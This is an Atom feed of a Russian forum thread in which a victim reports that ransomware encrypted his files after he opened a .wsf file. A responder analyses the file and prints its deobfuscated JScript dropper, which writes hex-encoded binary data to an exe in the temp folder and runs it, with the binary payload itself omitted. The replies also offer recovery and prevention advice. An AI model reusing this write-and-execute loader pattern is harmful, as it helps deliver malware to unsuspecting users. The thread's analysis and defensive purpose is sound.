<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
	<title type="html"><![CDATA[Серый форум &mdash; WSH: не могу открыть после запуска скрипта ни один файл]]></title>
	<link rel="self" href="https://forum.script-coding.com/extern.php?action=feed&amp;tid=12737&amp;type=atom" />
	<updated>2017-06-08T10:15:34Z</updated>
	<generator>PunBB</generator>
	<id>https://forum.script-coding.com/viewtopic.php?id=12737</id>
		<entry>
			<title type="html"><![CDATA[Re: WSH: не могу открыть после запуска скрипта ни один файл]]></title>
			<link rel="alternate" href="https://forum.script-coding.com/viewtopic.php?pid=116476#p116476" />
			<content type="html"><![CDATA[<p><strong>dimansuper</strong>, вы не пояснили, как заразились. Какой файл вы открыли?<br />В общем случае расшифровка невозможна. Можно попробовать утилиты восстановления удаленных данных, восстановление из теневых копий. <a href="http://www.spyware-ru.com/udalit-spora-ransomware-virus-shifrovalshhik-vosstanovit-zashifrovannye-fajly/">тыц</a>.<br />У меня настроен периодический бэкап на всякий случай.</p>]]></content>
			<author>
				<name><![CDATA[stealzy]]></name>
				<uri>https://forum.script-coding.com/profile.php?id=31937</uri>
			</author>
			<updated>2017-06-08T10:15:34Z</updated>
			<id>https://forum.script-coding.com/viewtopic.php?pid=116476#p116476</id>
		</entry>
		<entry>
			<title type="html"><![CDATA[Re: WSH: не могу открыть после запуска скрипта ни один файл]]></title>
			<link rel="alternate" href="https://forum.script-coding.com/viewtopic.php?pid=116475#p116475" />
			<content type="html"><![CDATA[<p><strong>stealzy</strong><br />А как можно дешифровать файлы есть способ?</p>]]></content>
			<author>
				<name><![CDATA[dimansuper]]></name>
				<uri>https://forum.script-coding.com/profile.php?id=37949</uri>
			</author>
			<updated>2017-06-08T10:05:34Z</updated>
			<id>https://forum.script-coding.com/viewtopic.php?pid=116475#p116475</id>
		</entry>
		<entry>
			<title type="html"><![CDATA[Re: WSH: не могу открыть после запуска скрипта ни один файл]]></title>
			<link rel="alternate" href="https://forum.script-coding.com/viewtopic.php?pid=116468#p116468" />
			<content type="html"><![CDATA[<p>Справочно для участников форума:<br />Публикация вредоносного кода на форуме запрещена. Лишь допустимо публиковать ту часть кода, которую нельзя исполнить &quot;как есть&quot;. Почему так? Поясняю: сервер находится на территории Российской Федерации, и в случае запроса от правоохранительных органов, обслуживающий&nbsp; хостер попросит лог-файлы пользователя форума, который осуществил распространение вредоносной компьютерной программы. Не сомневаюсь, что вся информация будет предоставлена без ведома администрации форума.</p><p>Во избежание провокаций прошу участников форума это учитывать.</p>]]></content>
			<author>
				<name><![CDATA[JSmаn]]></name>
				<uri>https://forum.script-coding.com/profile.php?id=24434</uri>
			</author>
			<updated>2017-06-08T08:47:20Z</updated>
			<id>https://forum.script-coding.com/viewtopic.php?pid=116468#p116468</id>
		</entry>
		<entry>
			<title type="html"><![CDATA[Re: WSH: не могу открыть после запуска скрипта ни один файл]]></title>
			<link rel="alternate" href="https://forum.script-coding.com/viewtopic.php?pid=116467#p116467" />
			<content type="html"><![CDATA[<p><span style="color: grey">Тут был шутливый комментарий относительно языка ТС, который администратор посчитал оскорбительным.</span><br />В папку temp записывается exe файл с бинарными данными (очищенными от пробельных символов) и выполняется.<br />Показатель <a href="https://www.virustotal.com/ru/file/7e5b276d6e34454d26ada8d192314df6e3ed3b3e747ef11614082e11b4de2fde/analysis/">virustotal - 45/61</a>, троян-шифровальщик.<br />Содержимое вашего txt после удаления binary data, NUL, WScript.Sleep(1) и повторения кода в теге &lt;script&gt; в конце.<br />Судя по именам переменных и кодированию строки в hex был применен обфускатор.</p><div class="codebox"><pre><code>/// 40280a72c1d9a1945df78bf3c970132a
/// 4e1b6347446467d3663d139ea6af3f5f
/// 36a2fb7eba7cebc6f010bb799641e10b
/// ed553ee6f65113c01604bb017a996cdd
/// fc0858314f56492ddf5e9a4e18f5190d
&lt;job&gt;

; binary data

&lt;/resource&gt;
&lt;object id=&quot;x18185919515&quot; progid=&quot;Scripting.FileSystemObject&quot; /&gt;
&lt;object id=&quot;x869040105151&quot; progid=&quot;ADODB.Stream&quot; /&gt;
&lt;object id=&quot;x59195910510&quot; progid=&quot;Shell.Application&quot; /&gt;
&lt;script&gt;
var x5151 = new ActiveXObject(&quot;MSXML2.DOMDocument&quot;).createElement(&quot;bits&quot;);
x5151.text=getResource(&quot;x951061&quot;).replace(/\s/g,&quot;&quot;);
x68910515=x18185919515.getSpecialFolder(2)+&quot;\\&quot;+x18185919515.getBaseName(x18185919515.getTempName())+&quot;\x2E\x65\x78\x65&quot;;
x5151.dataType=&quot;bin.hex&quot;;
x869040105151.type=1;
x869040105151.open();
x869040105151.write(x5151.nodeTypedValue);
x869040105151.saveToFile(x68910515);
x869040105151.close();
x59195910510.ShellExecute(x68910515);
&lt;/script&gt;&lt;/job&gt;</code></pre></div><p>Четыре верхние строки начинающиеся с /// - это что такое?<br />Да, расскажите нам зачем вы открыли неизвестный .wsf файл? От скуки?<br />Разумеется, о <a href="http://blog.windowsnt.lv/2011/05/30/preventing-malware-with-srp-russian/">групповых политиках</a> вы не слышали, и любой исполняемый файл у вас может быть запущен откуда угодно.</p>]]></content>
			<author>
				<name><![CDATA[stealzy]]></name>
				<uri>https://forum.script-coding.com/profile.php?id=31937</uri>
			</author>
			<updated>2017-06-08T06:39:50Z</updated>
			<id>https://forum.script-coding.com/viewtopic.php?pid=116467#p116467</id>
		</entry>
		<entry>
			<title type="html"><![CDATA[WSH: не могу открыть после запуска скрипта ни один файл]]></title>
			<link rel="alternate" href="https://forum.script-coding.com/viewtopic.php?pid=116456#p116456" />
			<content type="html"><![CDATA[<p>Открыл файл и все не могу открыть ни один файл. Вот файл и в конце там еще написано,какойто скрипт в текстовый скинул,и еще в конце там скрипт написан какойто,помогите пожалуйста!</p>]]></content>
			<author>
				<name><![CDATA[dimansuper]]></name>
				<uri>https://forum.script-coding.com/profile.php?id=37949</uri>
			</author>
			<updated>2017-06-07T19:41:33Z</updated>
			<id>https://forum.script-coding.com/viewtopic.php?pid=116456#p116456</id>
		</entry>
</feed>
